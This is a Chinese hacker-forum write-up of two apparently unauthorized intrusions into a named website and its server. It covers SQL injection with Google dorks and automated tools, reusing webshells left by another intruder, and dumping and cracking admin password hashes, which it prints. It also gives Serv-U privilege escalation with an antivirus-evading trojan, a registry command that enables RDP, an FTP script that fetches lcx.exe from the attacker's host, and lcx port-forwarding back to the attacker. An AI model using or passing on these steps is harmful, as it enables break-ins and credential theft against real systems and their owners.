一般情况下,一个网站很多栏目。粗心的程序员可能在某个文件中就没有对提交的变量进行过滤,有的过滤了的,但是只对小写过滤了。于是我多找了几个链接,试了多个。都不行。看来注入是没得戏了。这个时候大多数人估计都会旁注了。我可不想花那个时间。习惯性的看了下首页的源代码,看有没有什么信息。看到了下面这句。
我一惊喜,难得这就是传说中的列目录的漏洞。对于新事物总是有激情的。这个时候我有4个想法。
一是查看数据库的位置,然后下载默认的数据库。
二是找后台,用默认的帐户和密码试试。
三是看有没有上传漏洞
四是看看前面是不是有人浏览过了。
在admin目录里面顺利的发现了backdatebase。这不是数据库备份的么。?于是跳转到里面。真的是啊。!激动。如果下了数据库然后登入后台
拿webshell就有戏了。!点击数据库,发现不能下载。用迅雷也不行。看来数据库是防下载了。方法一失效。
接着来到后台。试了默认帐户密码和万能密码。都不行。!COOKIES欺骗也不行。
利用明小子的上传功能也不行,要有管理员权限。
哎。回到一开始的目录
admin/upload/pic
呵呵,柳暗花明啊。果然有人来过了。西式大马。貌似这个人蛮有名的哦
呵呵。在最低下有个小马
看来是别人没得清楚作案工具了。利用下面的小马顺利备份得到大马。
这个时候我就想了。竟然别人传了个小马,而且重名字来看是利用数据库备份得到的。就应该有注入漏洞来着啊。!怎么会没有啊,不甘心。静心想了想,可能是我检查的那几个网页都防注入了吧。应该有可注入的。我要后台看看去。想起啊D有批量监测的功能。于是打开啊D。利用啊D的浏览网页功能。打开google在搜索地方输入site:***.**zz.net inurl:asp
这句话的意思是在vod.qlzz.net这个网站里面搜索地址里面有asp的网址。呵呵。果然跑出注入点来了。3个哦。!
嘿嘿。搞笑ING。接着把可注入的抛去明小子监测下应该就OK了。但是。。但是。。竟然猜不出表明和列名。晕啊。!我有后台。!我有大马了,我还怕没有表段名。?于是在webshell里面大干了一场。(主要是我在后面的提权发现太难了。对方只开了个SERVE-U,MSSQL没有,而且目录权限设置BT,又是内网,所以我想试试用后台帐户登入FTP)发现,用户密码应该MD5加密。然后在news.asp里面发现了这个
<!--#include file="inc/St_conn.asp"-->
<!--#include file="admin/config.asp"-->
<!--#include file="inc/St_sysbody.asp"-->
<!--#include file="inc/St_syssub.asp"-->
<!--#include file="inc/St_function.asp"-->
<%
sql="select * from St_news where pass=true and date=#"&date()&"#"
set rs=server.createobject("adodb.recordset")
呵呵显然有St_news这个表段了。于是构造St_admin
在在明小子里面添加这个表段,。顺利得出内容
范围:共有2条记录!
admin_name内容:qlgz
admin_user内容:admin
admin_pass内容:6C4AA24193FD1F80051605A15650C5A3
user内容:admin
pass内容:-1
id内容:2
dmin_name内容:qlgz1
admin_user内容:admin1
admin_pass内容:FF508D18F94C7C05239A7793A6C25268
id内容:6
已全部检测完毕!
第一个密码跑不出,第二个跑出来是039014
顺利进入后台。!呵呵、
接下来就是继续看能不能拿下服务器了。
用刚才得到的后台账号密码登入3389,不行。用SERVE-U提权,也 不行。
上传CMD,提示上传成功,但是就是找不到。此次经历到此结束。
小结:
1.一些常用的漏洞是我们拿站的有利武器。
2.对于比较大的站点,可以利用啊D或者其他工具批量检查。
3.当显示可以注入但是不能拆解表名的时候,可以看看源文件,或许有思路
4.明小子可能一次没有得出正确的用户密码,这个时候可以多试几次。进了后台拿shell就相对容易了。
拿下服务器权限
朋友Novaa发过来一个webshell,让我提权试试,webshell里大体看了下组件信息,支持wscript.shell,心想这事就简单了,命令执行ipconfig看下,提示“拒绝访问”,看来是没有权限,于是尝试上传个cmd到有权限的目录尝试下,刚开始由于传的cmd太大,老提示缺少组件,宣告失败,后来想到command.com要比cmd.exe小很多,于是很顺利的上传成功,但是换了好几个有权限的目录均显示“没有权限”,看来管理员在权限上还是下了不少功夫的,于是查看server-u,虽然翻了一会翻到了目录,但是配置文件比较变态,尝试asp的serv-u的本地溢出提权,仍然以失败告终,虽然ftp用户写进去了,但是登录不进,看了下配置文件,估计是格式写错了,于是用webshell查看了下用户,有aspnet,aspnet的默认权限是users,立刻上传aspx马,失败,不能访问,发现里面也有几个aspx的马,估计是前人传的,仍然不能运行,后来仔细打开apsx马看了下,发现里面的东西全被改乱了,到处都是语法错误,于是弄了个简单的,放了个一句话的aspx马上去,保存再打开发现这次没被修改,立刻用客户端连接,成功连接,如图
尝试下加用户,不出所料,提示没有权限,于是又想到了server-u,便翻出来个serv-u的aspx提权马,传上去仍然不能执行,怒~~~忍~~!于是花了半个多小时时间对aspx提权马做了个免杀,上传,成功运行,ok!如图
查看用户,成功添加!
然后就是开3389,转出端口,执行reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f,成功,
接下来要传转发工具去了。首先在本地搭建好FTP服务器。然后在对方服务器器上写一个dat文件,内容如下:
open ip
username
mima
get lcx.exe c:\lcx.exe
bye
保存为1.dat
然后在服务器通过ftp –s:1.dat命令传了个lcx.exe上去,本机执行lcx –listen 38 3388 , 服务器执行lcx –slave 我的ip 38 127.0.0.1 3389,然后利用我们建的超级用户连接本机3388端口,成功登录如图:
此次提权到此结束。这次提权用到了很多老的方法,但是都夭折了。
Novaa:
真的十分感谢Rebeyond,这次拿站过程学到了很多东西。!
其实利用大马自带的SERV-U提权工具进行提权是行的通的(如图)。!
只不过DOMAIN要换为.14而不是那个默认的.13的。该服务器貌似有2个内网IP(一手夹烟得出的,谢谢一手)。
|
版权声明:转载请注明来自于“华夏黑客同盟”,否则将追究法律责任。 |
